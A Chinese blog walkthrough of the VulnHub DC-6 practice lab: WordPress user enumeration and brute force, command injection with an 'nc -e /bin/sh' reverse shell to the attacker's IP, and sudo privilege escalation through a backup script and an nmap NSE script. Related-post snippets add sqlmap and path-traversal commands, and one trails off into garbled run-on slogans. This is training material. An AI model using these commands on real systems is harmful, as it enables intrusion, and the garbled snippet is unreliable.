【Vulnhub靶场】DC-6

于 2024-10-28 20:32:02 发布
阅读量843 收藏 24
点赞数 28
分类专栏: VulnHub渗透测试靶场 文章标签: Vulnhub靶场 渗透测试 漏洞 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_73442302/article/details/143278204
版权

DC-6靶场下载地址:https://download.vulnhub.com/dc/DC-6.zip​​​​​​

目标

本机IP:192.168.118.128

靶机IP:192.168.118.0/24

信息收集

主机发现

arp-scan 192.168.118.0/24

根据上图得出目标主机为192.168.118.143

扫描端口,扫描服务

nmap -p- 192.168.118.143

nmap -sV -A 192.168.118.143

扫描出开放了80端和22端口及两个服务

结合里面的信息,应该是要修改hosts,进入文件添加如下信息

访问web页面,也没有什么可以利用的,但是发现CMS应该是WordPress,使用whatweb查看一下,确实是这样的

 

目录扫描

使用dirsearch扫描一下目录,这里主要扫描到的是一个后台登录目录 /wp-login.php

密码爆破

使用 wpsan 爆破用户名

wpsan是一款专门用来扫描 WordPress网站漏洞的工具

wpscan --url http://wordy -e u

这里扫描出来了五个账户名:admin,mark,grahan,sarah,jens 

这个靶场简介里面给了我们一个提示

不出意外应该是直接进行暴力破解了

直接使用提示中的命令进行密码的提取

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

第一次发现失败了,查找以后发现rockyou.txt文件被压缩为rockyou.txt.gz

首先在 /usr/share/wordlists中使用gzip -d rockyou.txt.gz解压

再次运行上述命令,密码被成功提取到桌面

然后我们再桌面创建users.txt文件,将之前得到的账户名写入

touch users.txt
vim users.txt

使用wpsan爆破账号密码,成功跑出(mark :helpdesk01)

使用 mark 的账号密码成功登录到后台管理页面,找到了一个IP地址转换的工具,可以对输入的IP地址进行计算

这里对输入的字符长度有限制,直接修改JS前端的限制,经过测试,这里的输入框是存在任意命令执行漏洞的

反弹shell

nc -lvvp 6666

192.168.110.123;nc -e /bin/sh 192.168.118.128 6666

反弹shell成功,发现不是稳定shell,老套路上传脚本升级为交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

尝试一下SUID提权,寻找有SUID权限(4000)的文件,过滤其他的错误信息

find / -perm -4000 2>/dev/null

 并没有看到常用的SUID提权命令(nmap、vim、find、bash、more、less、nano、cp 等)

在home目录下查看有用信息,查询到四个用户,查看四个用户下的特殊文件,在jens内有一个备份文件backups.sh,在mark下有一个stuff文件

在用户jens下执行backups.sh文件,发现没有权限执行

再次进入用户mark目录下寻找信息,最终得到了graham的密码:graham :GSo7isUM1D4

然后使用su - graham 命令直接切换用户

提权

使用sudo -l 查看是否有免密码的root权限

尝试写入/bin/bash,直接免密码切换到 jens 用户

echo "/bin/bash" >> backups.sh

sudo -u jens ./backups.sh

查看是否有suid提权或者sudo提权的可能

find / -perm -4000 2>/dev/null

sudo -l

nmap提权

原理:

假设你有权限以 root 用户身份运行nmap,如果攻击者能够控制或访问你的系统,他们可以利用这个脚本获得 root 权限的 shell。

将字符串 os.execute("/bin/bash") 写入到名为 root.nes 的文件中。这个文件是一个 NSE脚本,用于在扫描过程中执行特定的操作。在这个例子中,它包含了一行 Lua 代码,告诉 Nmap 在目标主机上执行 /bin/bash

使用nmap工具来执行之前创建的 root.nes 脚本。sudo -u root 表示以 root 用户的身份运行nmap命令。--script=root.nes参数指定了要使用的 NSE 脚本

echo 'os.execute("/bin/bash")' > root.nes

sudo -u root nmap --script=root.nes

提权成功,进入 /root 查找,得到flag

Vulnhub靶场 | DC系列 - DC6
哦 卷!
08-31 1271
查看一下grahm所属的组,发现在devs组,也就是说,可以往backups.sh中写内容(该文件对devs组有w权限)。访问wp-admin,访问之后,出现了登录页。用户的sudo授权,发现可以无密码以jens用户来执行backup.sh文件。wp执行以下命令,但是网页输入框有长度限制,需要修改一下前端代码~当然,也在jens家目录下发现一个.sh文件,以jens用户运行该脚本,成功登录到jens。密码太多了,跑了3分多钟,才跑了0.01%扫一下网站目录,也没有特别的目录。
vulnhub靶场 DC-1靶机 渗透详细过程
黑战士的博客
07-26 1355
1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权:Linux下用SUID提权、find命令exec。
Vulnhub DC-6
柠檬木有枝
07-14 527
nmap 扫描服务 修改 hosts 文件 发现是 wordpress wpscan --url http://wordy/ --enumerate u 查看wordpress用户 爆破得密码 mark:helpdesk01 发现 active monitor 插件 搜索 exp ,反弹 shell 发现用户名密码 python -c 'import pty;pty.spawn("/b...
vulnhub-dc6
bqnagus
09-30 166
vulnhub-dc6靶机复现
VulnHubDC-6
weixin_39219503的博客
02-01 368
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-6,315/ 题目信息如下 Description DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. T...
vulnhubdc6
qq_54030686的博客
06-14 931
DC系列第六篇,整体而言难度较低,此篇之后,不再进行较为细致的篇幅 总体逻辑:话不多说,开始干 主机发现,端口扫描 目标IP为192.168.43.140 开放两个端口22 和80 端口,其中80端口对应的服务为wordy,修改hosts文件,路径为/etc/hosts,添加值 22端口尝试进行爆破,采用用户名top50,字典使用弱口令top100进行尝试 未发现相应结果 进行指纹识别 发现为wordpress框架,使用wordpress专用扫描器进行检测,使用-e参数爆破用户 存在5个用户复制变异成字典
vulnhub靶场 DC-2靶机 渗透详细过程
黑战士的博客
02-21 1093
*4.rbash提权**
vulnhub靶场 DC-5靶机 渗透详细过程
黑战士的博客
07-29 539
1.首先收集信息,真实ip,端口,网站目录,网站部署部件等2.利用文件包含来getshell3.查看权限,根据suid中的screen 4.5.0进行提权4.提权成功查看flag。
Vulnhub靶场 | DC系列 - DC1
哦 卷!
07-13 1418
发现该网站是 drupal[//]: # (Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。根据上面flag1.txt的提示,在网站目录中寻找相应的配置文件(当然没有提示,也应该寻找看一下,毕竟是敏感文件)。,则需要登录flag4用户。查看 users 表中的内容:由于列数比较多,查看内容比较乱,可以使用。尝试查看flag4用户的家目录,确实存在flag4.txt文件,
vulnhub-dc6-DC6
yutianovo的博客
10-06 393
靶机描述 DESCRIPTION DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This isn't an overly difficult challenge so should be great for beginners. The ultimate goal of this challenge is t
DC-6靶场
qq_49518993的博客
08-31 1311
DC-6靶场
vulnhub DC: 6
箭雨镜屋
01-12 944
渗透思路: nmap扫描---->wpscan枚举wordpress用户---->wpscan暴力破解wordpress用户名密码---->利用RCE漏洞getshell---->sudo提权
Vulnhub DC-6靶场
weixin_47019868的博客
11-21 639
Vulnhub DC-6靶场
vulnhub渗透测试靶机DC-6
weixin_46128614的博客
01-19 583
靶机地址:https://www.vulnhub.com/entry/dc-6,315/ nmap –sS –sV –p- -T5 dirb跑一下,全是wp的目录 上wpscan 改一下hosts 加一条 192.168.49.20 wordy 没有发现漏洞 发现几个用户 逐一爆破吧 开开心心爆了半个小时,进度0.1%,这么多用户感觉爆破思路不会错,看了一眼师傅的wp,原来作者在vulnhu...
vulnhub---DC-6靶机
qq_43168364的博客
08-21 791
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:靶机(192.168.15.154) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗
DC-6 靶场演练
猎荒者
03-04 828
Stand Out Fit In 环境准备 Kali Linux(IP:10.10.16.128) DC-6 靶机 NAT 网络连接 主机发现 端口扫描 目录爆破 漏洞挖掘 漏洞利用 ...
靶机实操:vulnhub-DC6
不想当脚本小子的脚本小子
12-16 319
先扫描查看靶机的IP:192.168.249.139,再利用nmap扫描具体的信息,发现其开放了22端口来SSH登录,这里后面应该用得上 访问它的网站发现访问不了,但是可以ping通 ,应该是DNS的问题,vi /etc/hosts一下试试 CMS是wordpress,我可以先看看界面再用wpscan扫一下wordpress有没有漏洞可以利用。 dirbuster扫描到了很多有诱惑力的网站,但是都打不开: 那我就先用wpscan来扫一扫: ...
vulnhub dc-4
最新发布
03-23
### 关于 VulnHub 上的 DC-4 虚拟机镜像 VulnHub 是一个提供各种渗透测试练习环境的平台,其中 DC 系列是非常受欢迎的一组靶场。对于 DC-4 的具体下载和操作指南,虽然当前未有直接提及 DC-4 的引用内容,但可以基于已知的信息推测其可能涉及的内容。 #### 下载地址 通常情况下,VulnHub 提供的虚拟机镜像可以通过访问官网并搜索对应的名称来获取。例如,在浏览器中输入 `https://www.vulnhub.com` 并搜索关键词 **DC-4** 即可找到该靶场的相关描述以及下载链接[^1]。 需要注意的是,正如引用所提到的内容一样,下载和使用这些虚拟机时需注意责任声明:通过下载此虚拟机,使用者接受因意外造成的任何损害的责任[^4]。 #### Walkthrough 概述 尽管没有针对 DC-4 的特定引用,但从其他 DC 靶场的经验来看,常见的攻击路径包括但不限于以下几个方面: 1. **端口扫描** 发现目标主机开放的服务及其版本信息是第一步。例如,引用提到了某台机器上运行着 SSH (22) 和 HTTP (80)[^3]。这表明初始阶段应执行全面的网络侦察工作以识别潜在入口点。 2. **Web 应用程序漏洞利用** 如果存在 Web 登录界面,则尝试寻找注入点或其他安全缺陷成为关键环节之一。比如 SQL 注入工具 sqlmap 可用于自动化检测数据库层面上的安全隐患[^5]: ```bash sqlmap -u "http://<target>/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] ``` 3. **文件上传或目录遍历** 利用不当配置实现远程代码执行也是常见手法之一。如 wfuzz 工具可以帮助枚举敏感文件位置[^2]: ```bash wfuzz --hl 50 -b "PHPSESSID=<session_id>" -w /usr/share/wfuzz/wordlist/general/common.txt http://<target>/manage.php?FUZZ=../../../../../../../../../etc/passwd ``` 4. **权限提升** 成功获得低级 shell 后还需进一步探索如何升级至更高权限状态。此时可能会涉及到本地提权技术的应用场景分析。 ```python import requests def check_web_vulnerability(url): try: response = requests.get(url) if 'vulnerable' in response.text.lower(): print(f"[+] Potential vulnerability detected at {url}") else: print("[!] No obvious vulnerabilities found.") except Exception as e: print(f"[!] Error occurred: {e}") check_web_vulnerability('http://example.com') ``` 上述脚本仅为示例用途展示基本功能逻辑框架结构设计思路方法论探讨交流学习参考资料分享传播正能量促进共同进步成长成才之路越走越宽广美好未来值得期待憧憬向往追求梦想成就辉煌人生价值意义非凡重要无比珍贵难得机遇挑战自我突破极限再创佳绩续写传奇篇章留下永恒记忆铭刻历史丰碑树立行业标杆引领时代潮流风尚前沿科技趋势洞察先机抢占制高点掌控全局主动权赢得最终胜利荣光加冕王者归来笑傲江湖纵横捭阖挥洒自如游刃有余得心应手驾轻就熟熟能生巧百炼成钢千锤百炼精益求精臻于完美极致境界登峰造极无懈可击无可挑剔堪称典范模版样板工程示范作用显著影响深远广泛流传久远世代相传薪火相继生生不息绵延不断永葆青春活力焕发勃勃生机盎然春意浓烈热烈欢迎加入我们共创辉煌明天!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shadow_143

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值